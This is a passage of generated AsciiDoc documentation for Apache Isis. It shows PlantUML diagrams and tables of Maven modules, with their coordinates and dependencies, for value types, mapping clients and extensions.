packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Val - Server Sent Events (ui wicket)\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Value types\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n6 .[#707070].> 7 : \"\"\n3 .[#707070].> 6 : \"\"\n3 .[#707070].> 4 : \"\"\n3 .[#707070].> 5 : \"\"\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Valuetypes)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Value types\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes\nType: pom\nDirectory: \/valuetypes\n----\n|Value types for use within Apache Isis applications.\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Val - Server Sent Events (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse\nType: pom\nDirectory: \/valuetypes\/sse\n----\n|Dynamically updating HTML markup\n\n|Apache Isis Val - Server Sent Events\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse-applib\nType: jar\nDirectory: \/valuetypes\/sse\/applib\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/sse\/applib\/IsisModuleValSseApplib.adoc[IsisModuleValSseApplib], xref:refguide:valuetypes:index\/sse\/applib\/annotations\/ServerSentEvents.adoc[ServerSentEvents], xref:refguide:valuetypes:index\/sse\/applib\/annotations\/SseSource.adoc[SseSource], xref:refguide:valuetypes:index\/sse\/applib\/service\/SseChannel.adoc[SseChannel], xref:refguide:valuetypes:index\/sse\/applib\/service\/SseService.adoc[SseService]\n****\n\n|Apache Isis Val - Server Sent Events (metamodel)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse-metamodel\nType: jar\nDirectory: \/valuetypes\/sse\/metamodel\n----\n|.Components\n****\no.a.i.valuetypes.sse.metamodel.facets.SseAnnotationFacetFactory$Register +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-sse-applib:jar:<managed> +\n****\n\n|Apache Isis Val - SSE (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse-ui\nType: pom\nDirectory: \/valuetypes\/sse\/ui\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-sse-applib:jar:<managed> +\n****\n\n|Apache Isis Val - Server Sent Events (ui wicket)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse-ui-wkt\nType: jar\nDirectory: \/valuetypes\/sse\/ui\/wicket\n----\n|.Components\n****\no.a.i.valuetypes.sse.ui.wkt.markup.ListeningMarkupPanelFactoriesForWicket$Parented +\no.a.i.valuetypes.sse.ui.wkt.markup.ListeningMarkupPanelFactoriesForWicket$Standalone +\no.a.i.valuetypes.sse.ui.wkt.services.SseServiceDefault +\no.a.i.valuetypes.sse.ui.wkt.webmodule.WebModuleServerSentEvents +\n****\n\n.Dependencies\n****\norg.apache.isis.valuetypes:isis-valuetypes-sse-metamodel:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/sse\/ui\/wkt\/IsisModuleValSseUiWkt.adoc[IsisModuleValSseUiWkt], 
xref:refguide:valuetypes:index\/sse\/ui\/wkt\/services\/SseServiceDefault.adoc[SseServiceDefault], xref:refguide:valuetypes:index\/sse\/ui\/wkt\/webmodule\/WebModuleServerSentEvents.adoc[WebModuleServerSentEvents]\n****\n|===\n\n=== Asciidoc\n\n[plantuml,Asciidoc,svg]\n----\n@startuml(id=Asciidoc)\ntitle Asciidoc - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Asciidoc\\n[Software System]\" {\n rectangle \"==Apache Isis Val - Asciidoctor (MetaModel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Val - Asciidoctor (Persistence)\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Val - Asciidoctor (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Val - Asciidoctor (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Val - Asciidoctor (persistence jdo DN5)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Val - Asciidoctor (ui vaadin)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Val - Asciidoctor (ui wicket)\\n<size:10>[Container: packaging: jar]<\/size>\" <<9>> as 9\n rectangle \"==Apache Isis Val - Asciidoctor (ui)\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n}\n5 .[#707070].> 6 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 7 : \"\"\n7 .[#707070].> 9 : \"\"\n@enduml\n----\n.Projects\/Modules (Asciidoc)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Val - Asciidoctor (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc\nType: pom\nDirectory: \/valuetypes\/asciidoc\n----\n|Asciidoc value type.\n\n|Apache Isis Val - Asciidoctor (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-applib\nType: jar\nDirectory: \/valuetypes\/asciidoc\/applib\n----\n|.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.asciidoctor:asciidoctorj-api:jar:${asciidoctorj.version} +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/asciidoc\/applib\/IsisModuleValAsciidocApplib.adoc[IsisModuleValAsciidocApplib], xref:refguide:valuetypes:index\/asciidoc\/applib\/jaxb\/AsciiDocJaxbAdapter.adoc[AsciiDocJaxbAdapter], xref:refguide:valuetypes:index\/asciidoc\/applib\/value\/AsciiDoc.adoc[AsciiDoc]\n****\n\n|Apache Isis Val - 
Asciidoctor (MetaModel)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-metamodel\nType: jar\nDirectory: \/valuetypes\/asciidoc\/metamodel\n----\n|.Components\n****\no.a.i.valuetypes.asciidoc.metamodel.AsciiDocMetaModelRefiner +\no.a.i.valuetypes.asciidoc.metamodel.AsciiDocValueTypeProvider +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/asciidoc\/metamodel\/IsisModuleValAsciidocMetaModel.adoc[IsisModuleValAsciidocMetaModel]\n****\n\n|Apache Isis Val - Asciidoctor (Persistence)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-persistence\nType: pom\nDirectory: \/valuetypes\/asciidoc\/persistence\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-applib:jar:<managed> +\n****\n\n|Apache Isis Val - Asciidoctor (persistence jdo DN5)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-persistence-jdo-dn5\nType: jar\nDirectory: \/valuetypes\/asciidoc\/persistence\/jdo-dn5\n----\n|.Dependencies\n****\norg.datanucleus:datanucleus-core:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/asciidoc\/persistence\/jdo\/dn5\/IsisModuleValAsciidocPersistenceJdoDn5.adoc[IsisModuleValAsciidocPersistenceJdoDn5], xref:refguide:valuetypes:index\/asciidoc\/persistence\/jdo\/dn5\/converters\/IsisAsciiDocConverter.adoc[IsisAsciiDocConverter]\n****\n\n|Apache Isis Val - Asciidoctor (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-ui\nType: pom\nDirectory: \/valuetypes\/asciidoc\/ui\n----\n|.Dependencies\n****\ncom.github.jnr:jnr-constants:jar:0.10.1 +\ncom.github.jnr:jnr-enxio:jar:0.32.4 +\ncom.github.jnr:jnr-posix:jar:3.1.5 +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-applib:jar:<managed> +\norg.asciidoctor:asciidoctorj:jar:${asciidoctorj.version} +\n****\n\n|Apache Isis Val - Asciidoctor (ui vaadin)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-ui-vaa\nType: jar\nDirectory: \/valuetypes\/asciidoc\/ui\/vaadin\n----\n|.Components\n****\no.a.i.valuetypes.asciidoc.ui.vaa.components.AsciiDocFieldFactoryVaa +\n****\n\n.Dependencies\n****\norg.apache.isis.incubator.viewer:isis-viewer-vaadin-ui:jar:${project.version} +\n****\n\n|Apache Isis Val - Asciidoctor (ui wicket)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-ui-wkt\nType: jar\nDirectory: \/valuetypes\/asciidoc\/ui\/wicket\n----\n|.Components\n****\no.a.i.valuetypes.asciidoc.ui.wkt.components.AsciiDocPanelFactoriesWkt$Parented +\no.a.i.valuetypes.asciidoc.ui.wkt.components.AsciiDocPanelFactoriesWkt$Standalone +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.chg.v2.ChangesDtoPanelFactoriesWkt$Parented +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.chg.v2.ChangesDtoPanelFactoriesWkt$Standalone +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.cmd.v2.CommandDtoPanelFactoriesWkt$Parented +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.cmd.v2.CommandDtoPanelFactoriesWkt$Standalone +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.ixn.v2.InteractionDtoPanelFactoriesWkt$Parented 
+\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.ixn.v2.InteractionDtoPanelFactoriesWkt$Standalone +\n****\n\n.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/asciidoc\/ui\/wkt\/IsisModuleValAsciidocUiWkt.adoc[IsisModuleValAsciidocUiWkt]\n****\n|===\n\n=== Markdown\n\n[plantuml,Markdown,svg]\n----\n@startuml(id=Markdown)\ntitle Markdown - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Markdown\\n[Software System]\" {\n rectangle \"==Apache Isis Val - Markdown (MetaModel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Val - Markdown (Persistence)\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Val - Markdown (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Val - Markdown (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Val - Markdown (persistence jdo DN5)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Val - Markdown (ui wicket)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Val - Markdown (ui)\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n}\n5 .[#707070].> 6 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 7 : \"\"\n7 .[#707070].> 8 : \"\"\n@enduml\n----\n.Projects\/Modules (Markdown)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Val - Markdown (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown\nType: pom\nDirectory: \/valuetypes\/markdown\n----\n|Markdown value type.\n\n|Apache Isis Val - Markdown (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-applib\nType: jar\nDirectory: \/valuetypes\/markdown\/applib\n----\n|.Dependencies\n****\ncom.vladsch.flexmark:flexmark-all:jar:${flexmark.version} +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/markdown\/applib\/IsisModuleValMarkdownApplib.adoc[IsisModuleValMarkdownApplib], xref:refguide:valuetypes:index\/markdown\/applib\/jaxb\/MarkdownJaxbAdapter.adoc[MarkdownJaxbAdapter], xref:refguide:valuetypes:index\/markdown\/applib\/value\/Converter.adoc[Converter]\n****\n\n|Apache Isis Val - Markdown (MetaModel)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: 
isis-valuetypes-markdown-metamodel\nType: jar\nDirectory: \/valuetypes\/markdown\/metamodel\n----\n|.Components\n****\no.a.i.valuetypes.markdown.metamodel.MarkdownMetaModelRefiner +\no.a.i.valuetypes.markdown.metamodel.MarkdownValueTypeProvider +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/markdown\/metamodel\/IsisModuleValMarkdownMetaModel.adoc[IsisModuleValMarkdownMetaModel]\n****\n\n|Apache Isis Val - Markdown (Persistence)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-persistence\nType: pom\nDirectory: \/valuetypes\/markdown\/persistence\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +\n****\n\n|Apache Isis Val - Markdown (persistence jdo DN5)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-persistence-jdo-dn5\nType: jar\nDirectory: \/valuetypes\/markdown\/persistence\/jdo-dn5\n----\n|.Dependencies\n****\norg.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +\norg.datanucleus:datanucleus-core:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/markdown\/persistence\/jdo\/dn5\/IsisModuleValMarkdownPersistenceJdoDn5.adoc[IsisModuleValMarkdownPersistenceJdoDn5], xref:refguide:valuetypes:index\/markdown\/persistence\/jdo\/dn5\/converters\/IsisMarkdownConverter.adoc[IsisMarkdownConverter]\n****\n\n|Apache Isis Val - Markdown (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-ui\nType: pom\nDirectory: \/valuetypes\/markdown\/ui\n----\n|.Dependencies\n****\ncom.vladsch.flexmark:flexmark-all:jar:${flexmark.version} +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +\norg.jsoup:jsoup:jar:<managed> +\n****\n\n|Apache Isis Val - Markdown (ui wicket)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-ui-wkt\nType: jar\nDirectory: \/valuetypes\/markdown\/ui\/wicket\n----\n|.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/markdown\/ui\/wkt\/IsisModuleValMarkdownUiWkt.adoc[IsisModuleValMarkdownUiWkt]\n****\n|===\n\n=== SSE\n\n== Mappings\n\n[plantuml,Mappings,svg]\n----\n@startuml(id=Mappings)\ntitle Mappings - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Mappings\\n[Software System]\" {\n rectangle \"==Apache Isis Mappings\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Mappings)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Mappings\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings\nType: pom\nDirectory: \/mappings\n----\n|Libraries and tools to map one bounded context (usually an Apache Isis application) to some other BC (usually\n_not_ an Apache Isis 
application).\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n|===\n\n=== JAX-RS Client Library\n\n[plantuml,JAX-RS Client Library,svg]\n----\n@startuml(id=JAX-RS_Client_Library)\ntitle JAX-RS Client Library - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"JAX-RS Client Library\\n[Software System]\" {\n rectangle \"==Apache Isis Map - JaxRS Client (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Map - JaxRS Client (impl)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Map - JaxRS Client (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n@enduml\n----\n.Projects\/Modules (JAX-RS Client Library)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Map - JaxRS Client (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings-jaxrsclient\nType: pom\nDirectory: \/mappings\/jaxrsclient\n----\n|Integrates JaxRS Client Library\n\n|Apache Isis Map - JaxRS Client (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings-jaxrsclient-applib\nType: jar\nDirectory: \/mappings\/jaxrsclient\/applib\n----\n|.Dependencies\n****\njavax:javaee-api:jar:<managed> +\norg.springframework:spring-context:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/jaxrsclient\/applib\/IsisModuleExtJaxRsClientApplib.adoc[IsisModuleExtJaxRsClientApplib], xref:refguide:extensions:index\/jaxrsclient\/applib\/client\/JaxRsClient.adoc[JaxRsClient], xref:refguide:extensions:index\/jaxrsclient\/applib\/client\/JaxRsResponse.adoc[JaxRsResponse]\n****\n\n|Apache Isis Map - JaxRS Client (impl)\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings-jaxrsclient-impl\nType: jar\nDirectory: \/mappings\/jaxrsclient\/testlib\n----\n|.Dependencies\n****\norg.apache.isis.mappings:isis-mappings-jaxrsclient-applib:jar:<managed> +\n****\n|===\n\n=== REST Client\n\n[plantuml,REST Client,svg]\n----\n@startuml(id=REST_Client)\ntitle REST Client - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"REST Client\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - REST Client (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Ext - REST Client (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (REST Client)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - REST Client (parent)\n[source,yaml]\n----\nGroup: 
org.apache.isis.mappings\nArtifact: isis-mappings-restclient\nType: pom\nDirectory: \/mappings\/restclient\n----\n|A client for the Restful Objects Viewer\n\n|Apache Isis Ext - REST Client (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings-restclient-applib\nType: jar\nDirectory: \/mappings\/restclient\/applib\n----\n|A client for the Restful Objects Viewer\n\n.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-restfulobjects-applib:jar:<managed> +\norg.springframework:spring-context:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/restclient\/ActionParameterListBuilder.adoc[ActionParameterListBuilder], xref:refguide:extensions:index\/restclient\/IsisModuleExtRestClient.adoc[IsisModuleExtRestClient], xref:refguide:extensions:index\/restclient\/ResponseDigest.adoc[ResponseDigest], xref:refguide:extensions:index\/restclient\/RestfulClient.adoc[RestfulClient], xref:refguide:extensions:index\/restclient\/RestfulClientConfig.adoc[RestfulClientConfig], xref:refguide:extensions:index\/restclient\/RestfulClientException.adoc[RestfulClientException], xref:refguide:extensions:index\/restclient\/auth\/BasicAuthFilter.adoc[BasicAuthFilter], xref:refguide:extensions:index\/restclient\/log\/ClientConversationFilter.adoc[ClientConversationFilter], xref:refguide:extensions:index\/restclient\/log\/ClientConversationLogger.adoc[ClientConversationLogger]\n****\n|===\n\n== Extensions\n\n[plantuml,Extensions,svg]\n----\n@startuml(id=Extensions)\ntitle Extensions - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<11>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<22>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<12>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<23>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<24>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<13>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<14>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<15>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<16>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<17>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<18>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<19>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor 
#2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<20>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<21>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<10>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Extensions\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - CORS (impl)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Ext - CORS (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Ext - Flyway\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Ext - Flyway Impl\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Ext - Sec Man\\n<size:10>[Container: packaging: pom]<\/size>\" <<16>> as 16\n rectangle \"==Apache Isis Ext - Sec Man API\\n<size:10>[Container: packaging: jar]<\/size>\" <<17>> as 17\n rectangle \"==Apache Isis Ext - Sec Man Encryption (Using jbcrypt)\\n<size:10>[Container: packaging: jar]<\/size>\" <<18>> as 18\n rectangle \"==Apache Isis Ext - Sec Man Model\\n<size:10>[Container: packaging: jar]<\/size>\" <<19>> as 19\n rectangle \"==Apache Isis Ext - Sec Man Persistence (Using JDO)\\n<size:10>[Container: packaging: jar]<\/size>\" <<20>> as 20\n rectangle \"==Apache Isis Ext - Sec Man Persistence (Using JPA)\\n<size:10>[Container: packaging: jar]<\/size>\" <<21>> as 21\n rectangle \"==Apache Isis Ext - Sec Man Realm (Using Shiro)\\n<size:10>[Container: packaging: jar]<\/size>\" <<22>> as 22\n rectangle \"==Apache Isis Ext - Security - Shiro LDAP Realm (impl)\\n<size:10>[Container: packaging: jar]<\/size>\" <<24>> as 24\n rectangle \"==Apache Isis Ext - Security - Shiro LDAP Realm (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<23>> as 23\n rectangle \"==Apache Isis Ext - Wicket Viewer - Excel Download (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Ext - Wicket Viewer - Excel Download (ui)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Ext - Wicket Viewer - fullcalendar (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<10>> as 10\n 